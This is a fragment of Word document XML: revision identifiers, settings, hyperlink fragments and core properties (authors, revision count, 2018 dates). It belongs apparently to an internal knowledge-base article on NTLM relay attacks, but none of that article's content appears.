    <w:rsid w:val="0008647E"/>
    <w:rsid w:val="000D0753"/>
    <w:rsid w:val="000D1D0B"/>
    <w:rsid w:val="000F7AFA"/>
    <w:rsid w:val="001C2830"/>
    <w:rsid w:val="002C36AE"/>
    <w:rsid w:val="00321561"/>
    <w:rsid w:val="00402786"/>
    <w:rsid w:val="004164AC"/>
    <w:rsid w:val="004B7AB5"/>
    <w:rsid w:val="006350E3"/>
    <w:rsid w:val="0069514E"/>
    <w:rsid w:val="0081575B"/>
    <w:rsid w:val="0090616E"/>
    <w:rsid w:val="009F69BA"/>
    <w:rsid w:val="009F7F81"/>
    <w:rsid w:val="00A96441"/>
    <w:rsid w:val="00B94CB3"/>
    <w:rsid w:val="00C121A8"/>
    <w:rsid w:val="00C57FF0"/>
    <w:rsid w:val="00CE75F6"/>
    <w:rsid w:val="00D46FB6"/>
    <w:rsid w:val="00DA112B"/>
    <w:rsid w:val="00DA2524"/>
    <w:rsid w:val="00DF726B"/>
    <w:rsid w:val="00E142D0"/>
    <w:rsid w:val="00E17D26"/>
    <w:rsid w:val="00F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B7B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF2C5103-2754-4D6A-9220-1F60F8E7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1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6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4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4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t3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes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\\clt-fs01\nio\MASS\05.%20Knowledge%20Base%20Articles\NTLM%20Relay%20attacks%20v1%20R0.0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reSecurity/impacket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x-it.com/en/insights/blogs/blog/inside-windows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D0F1C-D517-4127-8351-C553B828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Keil</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Thompson</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-04-27T17:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-14T15:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>